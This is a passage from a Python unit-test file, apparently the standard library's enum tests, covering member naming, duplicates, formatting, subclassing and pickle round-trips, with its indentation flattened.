BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# for subclassing tests
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
def test_dir_on_class(self):
Season = self.Season
self.assertEqual(
set(dir(Season)),
set(['__class__', '__doc__', '__members__', '__module__',
'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
)
def test_dir_on_item(self):
Season = self.Season
self.assertEqual(
set(dir(Season.WINTER)),
set(['__class__', '__doc__', '__module__', 'name', 'value']),
)
def test_dir_with_added_behavior(self):
class Test(Enum):
this = 'that'
these = 'those'
def wowser(self):
return ("Wowser! I'm %s!" % self.name)
self.assertEqual(
set(dir(Test)),
set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
)
self.assertEqual(
set(dir(Test.this)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
)
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
class SuperEnum(Enum):
def invisible(self):
return "did you see me?"
class SubEnum(SuperEnum):
sample = 5
self.assertEqual(
set(dir(SubEnum.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), 'Season.' + season)
self.assertEqual(
repr(e),
'<Season.{0}: {1}>'.format(season, i),
)
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_create_= 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
def test_contains(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertRaises(TypeError):
3 in Season
with self.assertRaises(TypeError):
'AUTUMN' in Season
val = Season(3)
self.assertIn(val, Season)
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_format_enum_custom(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
def assertFormatIsValue(self, spec, member):
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
Grades = self.Grades
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited(self):
class StrEnum(str, Enum):
pass
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
self.assertTrue(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
